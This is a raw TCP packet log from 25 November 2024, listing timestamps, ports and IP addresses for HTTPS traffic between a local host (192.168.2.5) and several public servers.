Nov 25, 2024 11:34:07.160099030 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.160119057 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.181308031 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.181327105 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.181369066 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.181376934 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.181411982 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.181432009 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.195771933 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.213694096 CET	443	49922	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:07.214034081 CET	49922	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:07.214054108 CET	443	49922	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:07.214426041 CET	443	49922	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:07.214782953 CET	49922	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:07.214850903 CET	443	49922	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:07.214981079 CET	49922	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:07.215008020 CET	49922	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:07.215014935 CET	443	49922	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:07.229051113 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.229059935 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.229132891 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.229146957 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.231503010 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.231513023 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.231570005 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.231584072 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.231591940 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.231625080 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.231647015 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.237739086 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.237756014 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.237813950 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.237813950 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.237838984 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.237895012 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.241209984 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.241272926 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.241280079 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.241328955 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.243149042 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.243211031 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.243221998 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.243241072 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.243277073 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.243282080 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.243309975 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.243321896 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.243362904 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.243390083 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.246331930 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.246395111 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.246404886 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.249805927 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.249825001 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.249877930 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.249885082 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.249933958 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.253669977 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.253762007 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.253779888 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.253793001 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.253802061 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.253817081 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.253823042 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.253853083 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.262335062 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.262356043 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.262396097 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.262406111 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.262408018 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.262427092 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.262444973 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.262489080 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.262496948 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.266066074 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.266124010 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.266132116 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.270828962 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.270844936 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.270901918 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.270909071 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.274641991 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.274661064 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.274692059 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.274702072 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.274727106 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.278914928 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.278973103 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.278980970 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.279344082 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.279361010 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.279403925 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.279417992 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.279444933 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.280211926 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.280260086 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.280267000 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.280323029 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.280397892 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.280591011 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.280606985 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.284509897 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.284533978 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.284581900 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.284590960 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.284624100 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.284642935 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.287331104 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.287347078 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.287411928 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.287420034 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.290649891 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.290673018 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.290714025 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.290730000 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.290759087 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.290790081 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.294754982 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.294773102 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.294812918 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.294820070 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.294858932 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.298856974 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.298907042 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.298938036 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.298944950 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.298974991 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.299000025 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.301455021 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.301476955 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.301531076 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.301538944 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.301665068 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.301740885 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.301798105 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.301804066 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.301816940 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.301875114 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.302310944 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.302325010 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.302335024 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.302365065 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.303344965 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.303369999 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.303425074 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.303431988 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.303467989 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.316518068 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.316536903 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.316601038 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.316617012 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.316831112 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.329118013 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.329137087 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.329231977 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.329246044 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.329588890 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.343822956 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.343843937 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.343897104 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.343903065 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.343957901 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.357259035 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.357279062 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.357316971 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.357325077 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.357362986 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.357377052 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.371714115 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.371733904 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.371773005 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.371778011 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.371824026 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.388252974 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.447381973 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.447391033 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.447431087 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.447452068 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.447463989 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.447504997 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.447504997 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.447509050 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.447546959 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.447555065 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.451280117 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.451308012 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.451339006 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.451347113 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.451376915 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.451405048 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.455480099 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.455495119 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.455522060 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.455528975 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.455534935 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.455564022 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.463548899 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.463570118 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.463656902 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.463656902 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.463665009 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.471692085 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.471707106 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.471771955 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.471780062 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.471810102 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.473632097 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.473651886 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.473695993 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.473704100 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.473740101 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.473759890 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.476743937 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.476833105 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.476846933 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.476912022 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.476917028 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.477037907 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.478535891 CET	49894	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.478549004 CET	443	49894	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.478794098 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.478813887 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.478846073 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.478852987 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.478887081 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.482285976 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.482307911 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.482345104 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.482352972 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.482393026 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.482409000 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.484805107 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.484864950 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.484884024 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.484889984 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.484913111 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.484931946 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.486331940 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.486355066 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.486413002 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.486424923 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.494483948 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.494505882 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.494540930 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.494546890 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.494580030 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.494780064 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.494827032 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.494842052 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.494849920 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.494875908 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.494895935 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.502613068 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.502629042 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.502671957 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.502677917 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.503263950 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.503308058 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.503338099 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.503359079 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.503397942 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.503397942 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.509464979 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.509489059 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.509529114 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.509535074 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.509552002 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.509577990 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.510025024 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.510054111 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.510102987 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.510108948 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.510133982 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.510232925 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.510473013 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.510481119 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.530483007 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.530503988 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.530550957 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.530558109 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.530596018 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.530622005 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.649566889 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.649590015 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.649636984 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.649648905 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.649684906 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.657640934 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.657655954 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.657706976 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.657716036 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.657752037 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.657771111 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.657789946 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.657795906 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.657795906 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.657803059 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.657810926 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.657816887 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.657823086 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.657855988 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.657864094 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.657881975 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.657912970 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.657912970 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.664824963 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.664833069 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.664879084 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.664887905 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.664902925 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.664931059 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.664943933 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.664963007 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.672725916 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.672744989 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.672787905 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.672796011 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.672832966 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.675565958 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.675585985 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.675636053 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.675641060 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.675694942 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:07.677346945 CET	443	49922	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:07.677612066 CET	443	49922	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:07.677676916 CET	49922	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:07.678069115 CET	49922	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:07.678083897 CET	443	49922	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:07.680855036 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.680869102 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.680939913 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.680947065 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.688441038 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.688472986 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.688513994 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.688519955 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.688555002 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.693553925 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.693577051 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:07.693661928 CET	49920	443	192.168.2.5	49.13.32.95
